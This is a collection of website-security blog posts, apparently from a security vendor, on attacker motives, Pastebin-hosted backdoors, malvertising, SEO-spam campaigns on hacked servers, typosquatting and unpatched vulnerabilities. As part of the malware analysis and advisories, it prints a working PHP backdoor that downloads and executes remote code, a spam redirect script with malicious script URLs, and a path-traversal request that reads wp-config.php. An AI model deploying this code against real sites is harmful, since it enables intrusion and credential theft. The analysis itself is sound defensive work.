Why Websites Get Hacked

I spend a good amount of time engaging with website owners across a broad spectrum of businesses. Interestingly enough, unless I’m talking large enterprise, there is a common question that often comes up:

Why would anyone ever hack my website?

Depending on who you are, the answer to this can vary. Nonetheless, it often revolves around a few very finite explanations.

Automation is Key

Understand that the attacks affecting a large number of website owners in the prosumer (a term I’m using to describe those website owners in micro- small – and medium sized business space leveraging platforms like WordPress, Joomla and others) are predominantly automated. I wrote an article on the subject back in 2012, it’s important to revisit the subject as it’s still very relevant today.

The benefits of these automated attacks have not changed, they still provide the attackers the following benefits:

  • Mass Exposure
  • Reduces overhead
  • Tools for everyone regardless of skill
  • Dramatically increases the odds of success

It is not to say that these attacks are never manual, but for the mass majority, automated attacks are what we see during the initial phases of the attack sequence. When I say attack sequence I am referring to the order of events an attacker takes to compromise an environment.

A very simple illustration of the sequence would look something like:

  1. Reconnaissance
  2. Identification
  3. Exploitation
  4. Sustainment

The attack sequence can have varying levels of complexity depending on the group of attackers. When working with everyday websites, the most effective way to affect the largest number of websites at any given time would be with the deployment of scripts and bots during steps one and two. Although not always a manual process, steps three and four often have a tendency to have more manual elements to them, although many can be automated as well. While thinking of how these attacks occur, it is important to note the two forms of attack categories; attack of opportunity and targeted attack.

Attack of Opportunity

Almost all prosumers fall within the realm of opportunistic attacks. Meaning that it is not any one individual that is intentionally trying to hack your website, but rather a coincidence. Something about your site was caught by the trailing net as they randomly crawl the web. It could have been something simple like having a plugin installed, or maybe displaying the version of a platform.

In our analyses, we have found that it takes about 30 – 45 days for a new website, with no content or audience, to be identified and added to a bot crawler. Once added, the attacks commence immediately without any real rhyme or reason. It can be any type of website, the only commonality is that it is connected to the web.

These crawlers then begin looking for identifying markers. Is the website running one of the popular CMS applications (i.e. WordPress, Joomla! etc.)? If yes, is the website running any exploitable software (i.e. software vulnerabilities or bugs in code that can be exploited)? If the answer is yes, then the site will be marked for the next phase of the attack, exploitation.

The sequence of events can happen in a matter of minutes, days or months. It is not a singular event, instead it occurs continuously, always scanning for changes or updates. It is automated, therefore, once your website is on the list it will just continue trying.

Targeted Attack

This is often reserved for the larger businesses, but not always. Think of the NBC hack in 2013, or the recent Forbes hack.There are many examples of these types of hacks lately, and it is apparent why they would be targeted. The level of effort it takes to gain entry into these environments is exponentially more difficult but the gains can be astronomical. That being said, a very common form of targeted attack can be seen in something known as a Denial of Service attack in which the attacker works to bring down the availability of your site – common between competing businesses.

With that in mind, targeted attacks are not always reserved for the big boys. They can be deployed against smaller sites and can be driven by competition or pure boredom and the need for a challenge. These attacks can range from very simple to very complex as well.

Hacking Motivations and Drivers

Now that we have a better appreciation for the How, let’s turn our attention to the Why. That is why you are reading this.

Economic Gains

The most obvious of the reasons is economic gain. This often manifests in attacks known as Drive-by-Downloads or Blackhat SEO campaigns. As you might imagine, these are attempts to make money from your audience.

A Drive-by-download is the act of deploying what is known as a payload (i.e. injecting your website with malware) and hoping to infect as many of your website visitors. Think of your mom or dad visiting your website and the next thing you know, they are calling you because they installed a fake piece of software like you recommended on your website, but this time their bank accounts were drained. Scary, but very real and very devastating.

Blackhat SEO spam campaigns are not as devastating, however, in many instances can be more lucrative. This is the game of abusing your audience by directing them to pages that generate affiliate revenue. This is rampant in the pharmaceutical space, but has also extended to other industries like gambling, fashion and many others. What they do is inject links through your website, sometimes you see them, sometimes you won’t. On the contrary, when it comes to search engines like Google or Bing, they see everything and once those links make it onto the Search Engine Results Pages (SERPs) the attackers begin generating revenue from your audience.

System Resources

There is one motivator, the use of your resources, that many don’t talk about. When referring to resources, I am talking about things like bandwidth and physical server resources. I break this out as its own motivator, but it’s also a group under economic gain. The business of farming system resources is big business and a huge motivator for many cyber groups; they’re able to not only use it as part of their own networks, but build a leasing environment off your stack.

You have likely heard of large botnets and I have also referenced them above. Botnets are nothing more than interconnected systems across the net; they can be desktops, notebooks and even servers – similar to your webserver. They can be employed to perform tasks simultaneously. These can include Denial of Service Attacks, Brute Force Attacks, or even some of the automated attacks mentioned above.

These attacks that target your system resources are dangerous mainly because of their ability to attack without you, the website owner, even realizing it. You go about your day with no worries with your website appearing to be in good standing and with no complaints. Then one day out of the blue, your host shuts you down, your usage bill is through the roof or you receive a notice from the authorities about your hacking attempts.

Hacktivism

This motivator is perhaps the one that’s the hardest to contend with when it comes to getting your head around it. Similar to others, the drivers for these attacks are monetary or abusive. However, they are more finding a way to protest around a religious or political agenda or to show off to peers within the hacking community.

A very common form of this can be identified with Defacements. The point of these attacks often comes down to some form of awareness. This form of attack can be combined with others, but in our experience often are somewhat benign and create more embarrassment to the site owner rather than affecting their users.

Pure Boredom

Something that always catches folks off guard is the idea of people attacking website out of boredom and amusement, but it’s very true. It’s unfair to say they are always young, but a good percentage of the teim they are teens bored at home.

There really isn’t much to say about this other than, put your kids into sports!!

Good Security Begins with Good Posture

It’s easy to feel overwhelmed by some of this information, but it is our belief that the best tool you have at your disposal as a website owner is knowledge. Driving your head into the proverbial sand does not make these things disappear; it simply amplifies the impact if and when any of these attacks affect you directly. I assure you they happen more often than note, and Google agrees being they blacklist close to 10,000 sites a day for malware and flag over 20,000 sites for phishing a month.

Bruce Schneider likes to say:

as a species, we are risk averse when it comes to gains, but risk seeking when it comes to loss.

It is a very true and a very sad sentiment that I have to agree with. It becomes very evident when I speak with website owners and they say, “I have had a website for 10 years, never been hacked, I don’t need to worry about it.” Those also always make for the most interesting and painful conversations when the hack does occur. Some go as far to accuse us, “I was fine then hear you speak, or read your post.” A bit over the top, I agree, but it gives you a very small window in the state of mind once the hack does happen.

I like to think of website security in the form of posture. It is through good posture that you position yourself for success. I take this from my Brazilian Jiu jitsu training, where its through posture that you can help prevent positions that would see you in a lot of pain.

Remember, security is not about risk elimination, but rather risk reduction. You have heard this time and time again, risk will never be zero. You can, however, employ tools and steps to reduce it where you can so as not to become part of the statistic.

The Dynamics of Passwords

passwords

How often do you think about the passwords you’re using? Not only for your website, but also for everything else you do on the internet on a daily basis? Are you re-using any of the same passwords to make it easier to remember them?

We see it all too often: weak passwords used for FTP, database configuration, cPanel, and CMS logins. Everyone has their own password policy, it’s very personal, and usually based on a set of assumptions about online security. Many users choose policies of efficiency over security. Even the paranoid among us have to confront the truth. Like any defensive measure, best practices in password management can only minimize the level of risk.

Password management is a choice, and a habit. By taking a good look at the risks, users can make informed decisions and put better passwords into practice.

History of the Strong Password

Most password strength meters are too soft. The companies that use them know this, but they don’t want users to leave the registration process due to a restrictive password policy. Modern software can guess many so-called “strong” passwords in minutes, and the most common passwords in milliseconds. As password hacking grew in complexity over time, so did the requirements on passwords.


Read More

Creative Evasion Technique Against Website Firewalls

During one of our recent in-house Capture The Flag (CTF) events, I was playing with the idea of what could be done with Non-Breaking Spaces. I really wanted to win and surely there had to be a way through the existing evasion controls.

This post is going to be a bit code-heavy for most end-users, but if you choose to read you’re bound to find it very insightful.


Read More

Website Backdoors Leverage the Pastebin Service

We continue our series of posts about hacker attacks that exploit a vulnerability in older versions of the popular RevSlider plugin. In this post we’ll show you a different backdoor variant that abuses the legitimate Pastebin.com service for hosting malicious files.

Here’s the backdoor code:

if(array_keys($_GET)[0] == 'up'){
$content = file_get_contents("http://pastebin . com/raw.php?i=JK5r7NyS");
if($content){unlink('evex.php');
$fh2 = fopen("evex.php", 'a');
fwrite($fh2,$content);
fclose($fh2);
}}else{print "test";}

It’s more or less a typical backdoor. It downloads malicious code from a remote server and saves it in a file on a compromised site, making it available for execution. What makes this backdoor interesting is the choice of the remote server. It’s not being hosted on a hackers’ own site, not even a compromised site — now it’s Pastebin.com — the most popular web application for sharing code snippets.

Technically, the criminals used Pastebin for what it was built for – to share code snippets. The only catch is that the code is malicious, and it is used in illegal activity (hacking) directly off of the Pastebin website. Pastebin.com allows users to download the code in “raw” format (i.e. no HTML, no site UI, just the code — note the raw.php part of the URL).

Here’s an example of a slightly more elaborate backdoor, uploaded via the RevSlider hole:

Decoded backdoor that uses pastebin

Code-downloading backdoor from Pastebin

In the screenshot, you can see that this code injects content of the Base64-encoded $temp variable at the top of the WordPress core wp-links-opml.php file. You can see the decoded $temp content below:

Code-downloading backdoor from pastebin

Decoded backdoor that uses pastebin

Again, you can see that some code is being downloaded from Pastebin.com, saved to a file and immediately executed. This time this only happens when the attacker provides the Pastebin snippet ID in the wp_nonce_once request parameter (which is also used as a file name when they save the downloaded code). The use of the wp_nonce_once parameter hides the URL of malicious pastes (which makes it difficult to block) and at the same time adds flexibility to the backdoor — now it can download and execute any Pastebin.com snippet — even those that don’t exist at the time of injection — you just need to pass their ID’s in the request to wp-links-opml.php.

FathurFreakz encoder

I should also mention that Indonesian hackers have an encoder that was made specifically to work with Pastebin.com. It is called PHP Encryptor by Yogyakarta Black Hat or by FathurFreakz. Basically, they create a paste of their PHP code on Pastebin.com and then specify the URL of the code in the encryptor, which then generates obfuscated code that looks like this:

Encoded specifically for Pastebin

Encoded specifically for Pastebin

If you decode it, you’ll see this:

function FathurFreakz($ct3){
xcurl('http://pastebin.com/download.php?i='.code($ct3));
}
FathurFreakz(CODE);

This code downloads and executes a Pastebin.com paste (xcurl function) with the ID encrypted in the CODE constant. Here, you can see that they use one more special Pastebin.com URL type, download.php, which acts similarly to raw.php, but also provides HTTP headers to prevent browsers from displaying the content to download it as a file instead.

By the way, that hacker group likes using Pastebin.com so much that some of their backdoors look like this (decoded):

Pastebin malware decoded

Pastebin backdoor decoded

Hackers and Pastebin

Pastebin has a long history of being used by hackers of all ranks. Many hacker groups share data stolen from famous companies via the service. Pastes are being used as an anonymous intermediary storage for data stolen from user computers. Some pastes are known to be used in malware attacks – they may contain encrypted addresses and even base64-encoded malicious binary code. Here’s just a few notable headlines from the last 5 years:

This time we see relatively massive use of Pastebin in live attacks, which is quite new to us. This also suggests that we, security researchers, should be more careful when sharing malicious code we find in public pastes – it is easy for hackers to reuse them directly from Pastebin.com. It would be a good idea, before sharing, to make some obvious modification to the code that would prevent its execution when downloaded in a raw format.

Malvertising on a Website Without Ads

When you first configure your website, whether it be WordPress, Joomla, Drupal, or any other flavor of the month, it is often in its purest state. Unless ofcourse the server was previously compromised, which in it of itself is another conversation outright. Barring that one instance, the new website should not exhibit any malicious behavior. Or so you would think.

It’s rare though that a default theme will satisfy your every need, it’s often has just enough to wet your beak and get you thinking of ways to extend functionality. So we set off to extend and leverage all the features our favorite CMS offer us.

Watering Down Core Security

The next steps are to add on, to extend. New themes, plugins, sliders, animated gifs, music… no, wait, that’s too 1990’s. Let’s focus on themes, plugins, templates and various other extensions found in today’s modern CMS applications.

Often, the first thing you have in mind when choosing anything for your website is functionality and aesthetics, right? We all want something that looks great and improves user experience. It may be a really cool theme or the newest social network plugin; it’s not a common practice however to inspect its behavior.

What if one of the add-ons you installed is injecting hidden ads on your site? Or what if they are loading pop-up windows like this one?

HD Video Player Advertisement

Malicious Fake Flash Download

This is exactly what a client recently experienced. After installing a clean install of their CMS, configuring and extending it with a new theme, their website started to present it’s users with a Flash installer. For those wondering, this is fairly common, and is something known as a Drive-by-Download. More on that another time though.

Following The Trail

As is natural for us in the research group we can’t help but get lost in cookie trails, every crumbs proves to be more fascinating than that last.

While investigating, it became apparent that the Flash installer was being loaded via an ad, an ad that was being served via an ad network. Immediately I’m thinking malvertising, right?

In this case, the owner hadn’t configured advertising though and yet it was loading content from an ad network.

For your reference, here’s the HTTP Request showing the ad was being loaded by the infected website.

HTTP Headers of the Malvertising Campaign

HTTP Headers of the Malvertising Campaign

While investigating the code I couldn’t find any reference to the adcash.com domain in either the theme or plugin files. Again, the website owner confirmed that he was not using any ad networks. So that left us no choice but to dig a little deeper, we started to investigate the HTTP traffic.

While intercepting the sites Requests and Responses I came across the following entry:

Sucuri - AdCash

Sucuri – AdCash

It’s a request to hxxp:// 37.187.248.215 that returned a 302 Redirect to adcash.com. Yes, success!!! All right! We are one step closer to the source, I was probably looking for the wrong URL in the source code. Duh… Address noted, let’s keep checking the HTTP traffic.

Checking the HTTP responses for that IP address I found this:

URL Variable in HTTP Headers

URL Variable in HTTP Headers

There it is, the hit counter JavaScript code was loading the ad, as you can see the URL in the uri84 variable. It is making a request here: counter6.statcounterfree.com. This request was causing the popup, but was only being triggered once per visitor and the content looks random, suspicious and, more importantly, unwanted.

Adware or Malvertising?

Turns out that the client did in fact add the counter script to their themes footer, so it didn’t come prepackaged. They were trying to keep track of their visitors, they had no intentions of their site being used to serve ads though.

So being that the source of the counter was www.freecounterstat.com I decided to spend some time familiarizing myself with what they do. I spent some time reading through their End User License Agreement (EULA), you never know what goodness you agree too.

Unfortunately, no luck, nothing related to terms or privacy on the website. So I contacted their support to see if this type of behavior was expected.

Based on their response, I’d argue it probably wasn’t:

Hi,

I turn off popup on your account

chris

This is the message I received from support. There are obviously a number of things with that response that worry me, but now the clients website is clean. Whether intentional or not, it’s hard to say, but I’d likely categorize it as a compromised ad network and a malvertising attack.

Personally, I’d stop using this counter script. It’s obviously very 1990 for one, but more importantly if the solution is to disable ads for this site, but not address the bigger issue of drive by downloads being used via the service, that is very concerning. We’ve written about the dangers third-party scripts and service introduce to your environment, this is another example of that.

Conclusion

It is really hard to keep an online service, and even harder if you are doing this for free, so it is understandable that a service uses the adware model to maintain itself. However, it must disclose this to it’s users and offer them an option to opt out. To do it and not offer a user this options is wrong, and as website owners you must be more diligent.

Always check the terms, EULA and privacy policies of third-party software you are using on your website. If they don’t have them, that’s probably a good sign not to use them. Look for any suspicious terms before agreeing to them. If you need help, or you suspect that a plugin or theme is behaving maliciously, let us know.

We love looking through code and potential issues…:) Hit us up at labs@sucuri.net. Happy hunting!!

IIS, Compromised GoDaddy Servers, and Cyber Monday Spam

While doing an analysis of one black-hat SEO doorway on a hacked site, I noticed that it linked to many similar doorways on other websites, and all those websites were on IIS servers. When I see these patterns, I try to dig deeper and figure out what else those websites have in common. This time I revealed quite a few GoDaddy Windows servers have been pwned by “replica spam” hackers.

Let’s Dig Into Some Numbers

1,782 Domains. I collected 1,782 unique compromised domains that hackers use in this campaign. This list is just a tip of an iceberg and I’ll show why a bit later, so read on.

305 IP Addresses. Those websites are scattered across 305 unique IP addresses (actually 304, if we ignore four domains whose addresses I couldn’t resolve). This means roughly 6 websites per IP, however they are not evenly distributed and while many IPs only have one compromised site, some of the servers have hundreds of them.

Top networks:

  • GoDaddy: 95 hosts (31%) and 1,095 websites ( 61%. )
  • Brinkster: 50 hosts (16%) and 258 websites (14%)
  • Network Solutions: 27 hosts (9%) and 77 websites (4%)
  • Versaweb LLC: 5 hosts (1.6%) and 88 websites (5%)

As you can see, 84% of all websites belong to 4 networks.

Let’s look closer at servers on these networks, but before we do it I’ll show how I find compromised websites.

Cyber Monday Spam

The spam campaign I’m investigating is promoting online stores that sell cheap “replicas” of popular luxury brands like Beats by Dre, Michael Kors, Lululemon, Uggs, Juicy Couture, Moncler, Ray Ban, etc. Most of the doorways are currently optimized for Black Friday and Cyber Monday deals. The typical anchor text they use in their links is something like “michael kors cyber monday” or “uggs black friday“.

These spammy links point to the homepage of compromised websites, which typically have a block of hidden links at the bottom of HTML code:

<div style="position:absolute;filter:alpha(opacity=0);opacity:0.001;z-index:10;"> ... 
30-400 spammy links here ... 
</div>

If the website is vulnerable enough, hackers will install a script that generates completely new spammy pages specifically for search engines and return normal pages for human visitors — cloaking. The “human” versions of the pages have a small script at the very top of the HTML (usually before the tag) that redirects web searchers to spammy sites. It either something like this:

<script>
var s=document.referrer;
if(s.indexOf("google")>0 || s.indexOf("bing")>0 || s.indexOf("aol")>0 || s.indexOf("yahoo")>0)
{
self.location='hxxp://www .jackets pretty .com'; //just one of many domains they use
}</script>

or a similar script, loaded from the spammers’ own server:

<script src="hxxp://nofie.talkmes . com/c/nofie.js" type="text/javascript"></script>

At this point they use the following script URLs:

hxxp://bats . solorule . com/d/bats.js
hxxp://bats . solorule . com/c/bats.js
hxxp://cancher . iamsanver . com/a/cancher.js
hxxp://cancher . letgopub . com/c/cancher.js
hxxp://cancher . sanonsport . com/d/cancher.js
hxxp://luover . unbangs . com/c/luover.js
hxxp://meika . ruvipshop . com/a/meika.js
hxxp://meika . sportruns . com/d/meika.js
hxxp://meika . ruvipshop . com/a/meika.js
hxxp://meika . ukingfans . com/c/meika.js
hxxp://nofie . godalice . com/d/cagode.js
hxxp://nofie . godalice . com/kspe.js
hxxp://nofie . rockenice . com/a/cagode.js
hxxp://nofie . rockenice . com/a/nofie.js
hxxp://nofie . talkmes . com/c/nofie.js
hxxp://ungogo . godleders . com/a/ungogo.js
hxxp://ungogo . leftgod . com/c/ungogo.js
hxxp://ungogo . leftgod . com/c/ungogo.js
hxxp://ungogo . nightleder . com/d/ungogo.js
hxxp://js . xufengonline . com/js/zong.js
hxxp://www . monclerslocker . com/js/style.js

Most of them are on the 173.252.207.166 IP (Take 2 Hosting Inc).

Detection

Any of these variants are easily detected by both Sucuri SiteCheck and Unmask Parasites, so it’s not a problem to check websites and tell whether they are infected or not.

Now that we know how to detect the infection, let’s just test random websites on some of the IPs that have many infected websites (based on my doorway analysis).

For example, let’s take 184.168.152.150 (where I found 25 doorways) and use the Bing’s “ip:” search operator along with the “cyber monday” keyword to find websites on that server: http://www.bing.com/search?q=ip%3A184.168.152.150+cyber+monday. Now you can scan websites for results that point to home pages (/ or index.html). More than 70% of the websites I checked are still infected (the rest either won’t load or have been cleaned already).

Bing Cyber Monday Results

Bing Cyber Monday Results

Compromised Servers

This simple Bing search revealed hundreds of infected websites on that server. I observed the same results for 49 out of 95 GoDaddy servers from my list.

184.168.152.149
184.168.152.150
184.168.152.151
184.168.152.3
184.168.27.116
184.168.27.204
184.168.27.205
184.168.27.206
184.168.27.32
184.168.27.33
184.168.27.34
184.168.27.35
184.168.27.36
184.168.27.37
184.168.27.39
184.168.27.40
184.168.27.41
184.168.27.44
184.168.27.46
184.168.27.47
184.168.27.81
184.168.27.82
184.168.27.83
184.168.46.17
184.168.46.18
184.168.46.74
50.63.196.33
50.63.196.34
50.63.196.35
50.63.196.47
50.63.197.10
50.63.197.12
50.63.197.13
50.63.197.139
50.63.197.140
50.63.197.141
50.63.197.142
50.63.197.144
50.63.197.145
50.63.197.203
50.63.197.206
50.63.197.207
50.63.197.208
50.63.197.6
50.63.197.7
50.63.197.8
50.63.197.9
50.63.202.26
97.74.215.156

Those 49 servers are shared Windows servers with thousands of sites. For example, Domaintools.com says 2,050 sites use the 184.168.152.150 address. The websites I checked belong to different users so it’s not just a matter of individual compromised accounts. And the websites are quite heterogeneous – ASP, PHP, pure HTML, etc. so it doesn’t look like a common web application vulnerability either. It looks like those servers have been pwned by hackers who now have access to most user accounts there. Given that we have almost 50 known such Windows servers on the GoDaddy network, this may mean some infrastructure level problems or at least common Windows server security configuration issues.

The rest of the servers typically have one or very few websites (I suppose either dedicated servers or IPs) so they don’t affect this hypothesis.

Some of the Brinkster and Versaweb servers also have this issue:

65.182.100.172
65.182.100.177
65.182.100.186
65.182.100.191
65.182.100.88
65.182.101.106
65.182.101.150
65.182.101.152
65.182.101.206
65.182.101.207
65.182.101.41
65.182.101.60

76.164.226.242
76.164.226.243
76.164.226.244
76.164.226.245
76.164.226.246

It’s still not clear why all websites on those servers have not been infected (or have they been cleaned already?). Maybe hackers infected them semi-manually, so just a few hundred infected websites was good enough for them?

When checking random websites on the compromised servers I noticed that some of them used very old versions of CMS’s (e.g. 4 year old WordPress). Maybe such websites were the penetration points that helped hackers compromise the whole servers later?

I also know that hackers install PHP wrapper scripts on pure HTML sites. For example, it’s typical to see a default.php working instead of index.html when you request a homepage. This wrapper script explains why you see the injected script at the very top of the HTML code and how hackers manage to implement “cloaking” on pure HTML sites.

At this point, I can only see the following things in common on the servers used in this spam campaign:

  • Windows
  • IIS (usually an old version)
  • PHP support

I wonder if this combination has a known security hole that allows to pwn server?

To Webmasters

This time I’d like to reach out to webmasters who host their websites on shared Windows servers. Especially to GoDaddy clients.

Please Check Your Websites ASAP!

You can start with free online scanners like Sucuri SiteCheck and Unmask Parasites,

Then check search results for your website on Google (the “site:” operator), where you should look for unexpected keywords in your page titles and descriptions. Make sure to check “cached” copies that Google store for your site. Then add the following keywords to your “site:” search that may help your spot more web spam:

  • site:yourdomain.com cheap
  • site:yourdomain.com buy online
  • site:yourdomain.com “cyber monday”
  • site:yourdomain.com “black friday”
  • site:yourdomain.com outlet

Then you might want to figure out if your server looks compromised. First, identify your website’s IP address. You can use commands like ping or host, you can enter your domain name on a website like whois.domaintools.com, or you can at least ask your hosting provider. With your IP, you can then use the Bing‘s “ip:” search along with some spammy keywords.

Here are a few searches that I suggest you can try:

ip:ip address cyber monday
ip:ip address black friday
ip:ip address ”beat by dre cheap”
ip:ip address ”Cheap Louis Vuitton”
ip:ip address viagra online
ip:ip address payday loans
ip:ip address “order cialis online”

If you see many results from different websites, you might want to ask your hosting provider what’s going on there, and if the server is really secure.

We are currently contacting hosting providers so they can address this issue…

Leveraging the WordPress Platform for SPAM

We’ve all seen WordPress comment and pingback spam, but thanks to strict moderation regimes and brilliant WordPress plugins that focus strictly on SPAM comments, comment spam isn’t a major problem for most websites these days. I have seen however, a new trend starting to emerge when it comes to spam involving WordPress.

In recent years WordPress has become the go-to platform for people looking to start their own website. It is easily installed and set-up, relatively light on resources, and has a high level of functionality. This feature list is not only appealing to everyday users, it is also appealing to spammers for the exact same reasons.


Read More

Typos Can have a Bigger Impact Than Expected

Have you ever thought about the cost of a typo? You know what I mean, a simple misspelling of a word somewhere on your website. Do you think there’s a risk in that?

You may have seen the Grammar Police all over your comments yelling that you used the wrong version of “your” and pointing out how stupid you are, right? Unfortunately, that’s the internet. But what if you have misspelled something that your readers can’t see right away?

Gogle API

What if your typo was in some third-party JavaScript? For example, ajax.gogleapis.com instead of ajax.googleapis.com ? There’s a chance that the domain doesn’t exist and the website just breaks, forcing you to spend some time debugging it to find the wrong include. No big deal. But there is a more dangerous possibility here. The domain could be registered and serving malware to those websites.

Luckily enough the owner of ajax.gogleapis.com, Robin Bradshaw, reached out to us with his findings. He posted on Twitter in response to a recent post of ours about the dangers of hosting third-party scripts. Bradshaw told us that he bought the domain because he was bored and wanted to check if those typos were an issue. He got some interesting data.

It is impressive how many hits it has been receiving since February:

Graphs show 70K views per month

Monthly visits to the misspelled gogleapis.com

Most traffic is coming from Brazilian IP addresses, which is getting there thorough an NGO website. They were contacted to fix this typo, but they never replied. Still waiting for the fix. All the other websites seem to be fixing their code quickly.

Brazil is largest by far, followed by Italy and US

Breakdown of countries using the typos script

Since Bradshaw is such a great guy, not only he did take the typo away from the hands of a person with malicious intentions, but he’s also serving a valid working copy of the ga.js file. Could you imagine how harmful it would be if someone else had gotten a hold of this domain? Someone could easily add to that ga.js file and serve malware or injected malicious SEO.

Typo Squatting

We have looked at one of the possible typos, but what about others?

Of course other people have already thought about using this technique as a way to distribute malware. In this case, the idea is not to register the domain and wait for someone to mistakenly write the URL incorrectly, but rather to deceive the user when they are investigating malicious or suspicious code on their website.

I was able to find a similarly misspelled URL: googleaspis(dot)com. The content is not malicious right now, but it is not serving the right script and it is redirecting the user to a different website.

HTTP headsers of googleaspis.com Redirects to another domain

Googleaspis(dot)com Redirects

A quick check on GitHub revealed one repository with a link to this website. Interestingly, the file name was index_malware.html. The website owner probably wasn’t able to find the malware there and recreated the whole index file, but it’s just speculation.

Github shows typo in index_malware.html

Github shows typo in index_malware.html

There are other typo domains hosted on the same server, like: facebookapis(dot)com, facebboklogin(dot)com, fgoogleapis(dot)com, oogleapis(dot)com and many others.

Conclusion

During my checks I didn’t find any malicious code being hosted by misspelled domains, but that doesn’t mean that there aren’t any. I checked more than 200 variations of Google’s domains used to host scripts for statistics and styles, and all the sites which answered were parked domains. The most suspicious behavior is the one I shared in this post. It does provide for some interesting food for thought though.

Remember to check and double-check all the external content you add to your site. Make sure it’s from a reliable source and that it is typed correctly. The price of a single misspelled character on a domain can be really high.

Protecting Against Unknown Software Vulnerabilities

Bugs exist in every piece of code. It is suggested that for every 1,000 lines of code, there are on average 1 to 5 bugs to be found.

Some of these bugs can have security implications. These are known as vulnerabilities, and they can be used to exploit and compromise your server, your site and your users.

As long as there are people involved in the process of writing code and setting up systems, mistakes will happen as it is part of human nature. As such, security problems will always be something we have to deal with.

Impact of Vulnerabilities on Websites

Why does it matter that much? Last week, both WordPress and Drupal released new versions of their Content Management System (CMS) to patch important security vulnerabilities. Other popular WordPress plugins also released updates to fix their vulnerabilities.

Once a vulnerability is found and a patch is available, the solution is simple: Apply the patch (by doing an update) and you are now protected. It is the endless cycle that is known as software development. A bug will be found, a patch will be available, the patch is applied, another bug is found, a new patch is available, the patch is applied. Every time a new feature is introduced, new bugs are also introduced with it.

It seems like a simple process for a webmaster that as long as he is updated, he is safe.

However…

How do you protect against unknown software vulnerabilities?

What if you do not know about a specific vulnerability, how do you patch and protect your website?

What if an update goes out over a long weekend? A 0-day gets disclosed before an update is available? Or what if a vulnerability is discovered by the bad guys and they start using it without telling anyone?

  • The latest SQL injection vulnerability in the Drupal platform was being exploited within 7 hours of it’s disclosure.
  • Websites were being compromised via TimThumb before the public knew about it and a patch was available
  • We have hits in our logs from days before the latest XSS vulnerability in WordPress was disclosed.

So the question is, how do you increase your security so that you can minimize the risk and the chances of being compromised when (not if) someone tries to attack your site misusing an unpatched / unknown vulnerability?

You have options:

  1. Restrict who can access parts of your site to minimize the attack footprint.
  2. Employ prevention solutions that try to block exploit behaviors (generally called WAF’s or IPS’s).
  3. Harden parts of your stack to minimize the effect of an exploit.
  4. Constant network and log monitoring to identify Indicators of Compromise (IoC).

These are just some examples. They may sound hard or too advanced, but they are actually doable and every website owner should look into it.

Think about your desktop / notebook computer for a second. Why does every (or almost every) desktop have a personal firewall, an anti-virus, a spam filter and other similar tools? Yes, even Macs have them as well.

Why do most networks (including home networks) run behind a router with basic / advanced firewalls working to filter and prevent attacks from the Intranet?

The reason is simple: minimize the footprint and options for an attacker.

Now think about your website[s]. Let’s look at a few examples into how that can be applied to your Website security:

WordPress 4.0 Long Password DOS

Both Drupal and WordPress had a vulnerability disclosed last week that allowed an attacker to DoS (Denial of Service) a site by sending many, very long passwords in the login requests.

Prevention: Access Restriction / Reduced Footprint.
Block wp-login and wp-admin access only to authorized IP addresses. If an attacker can’t reach your login page, he won’t be able to exploit this vulnerability.

Simple solution that anyone can do by adding an .htaccess to your wp-admin allowing just a few IPs. We find this feature important enough that we employ it to our stack by default and set it as default for all users of our Website Firewall product.

Paid Memberships Pro Path Traversal

Paid Memberships Pro is a popular WordPress plugin that had a path transversal (arbitrary file download) vulnerability disclosed last week. The exploit is possible by accessing: wp-admin/admin-ajax.php and passing a file to be downloaded via getfile:

wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php

Prevention: Access restriction / reduced footprint.
The same as before, restrict access to only whitelisted IPs.

Prevention 2: WAF/IPS.
Even if the previous restriction was bypassed, an Intrusion Prevention System (IPS) or Web Application Firewall (WAF) would prevent it from being exploited through generic Local File Inclusion / Remote File Inclusion (LFI/RFI) rules.

WordPress 3.9.x stored XSS

WordPress versions 3.9.2 and earlier are affected by a critical cross-site scripting vulnerability, which could enable anonymous users to compromise a site. This was reported and patched last week as well.

This vulnerability abuses the core commenting system, an attacker is able to craft a simple comment to send a malicious payload that when viewed by the administrator, allows the attacker to take over the site. This explains it’s severity.

Prevention: Reduced footprint.
First, if your site does not need or use comments, why leave it open? You can block any access to wp-comments-post via .htaccess and be covered right away. If you do need comments, you can use external commenting systems that keep untrusted (user data) away from your trusted data (posts, pages, etc).

Prevention 2: Prevention technology.
Even if you do allow comments, employing a WAF or IPS would probably have blocked this XSS via generic XSS signatures that most good prevention products have.

WP-Statistics XSS

Our research team found a stored XSS in the very popular wp-statistics plugin.

Prevention: WAF/IPS.
This is where having a good WAF / IPS solution in place becomes a must. A WAF have (or should have) a XSS detection that will block this attack generically, without even knowing about this specific vulnerability. On our own WAF, we were blocking it automatically before even knowing about this bug, in a way that we did not even need to write a virtual patching for it.

Staying ahead of Unknowns

Last weeks releases are growing in number each month, as they do the importance of being able to tackle the problem of unknowns grows. Following some of the steps above would improve your over Security posture allowing you to better recognize and respond to these issues, reducing your overall risk footprint.

We offer a product that can do this all, but many of the recommendations you can employ on your own by leveraging open technologies and .htaccess changes:

  • Restrict access to wp-admin/wp-login (and any other access point) only to authorized IPs.
  • Limit footprint. Do you need comments? Do you use XMLRPC? Blocking everything and only allowing what you really need.
  • Leverage a WAF / IPS and you can do this with products like Modsecurity and OSSEC.

We’ve obviously built a technology that automates all these things for you, allowing you to get back to running your business, but you can see there are various options available to you. If you’re interested in a free trial, ping us at info@sucuri.net.

Website Malware Removal: Phishing

As we continue on our Malware Removal series we turn our attention to the increasing threat of Phishing infections.

Just like a fisherman casts and reels with his fishing rod, a “phisher-man” will try their luck baiting users with fake pages, often in the form of login pages. These copied website pages are cast into infected websites with the hope that some users will bite, and get reeled into giving away their secret data. Wielding the web development and scripting knowledge necessary to make forms that look convincingly realistic, hackers lure unsuspecting users into entering their credentials on the imitated page.


Read More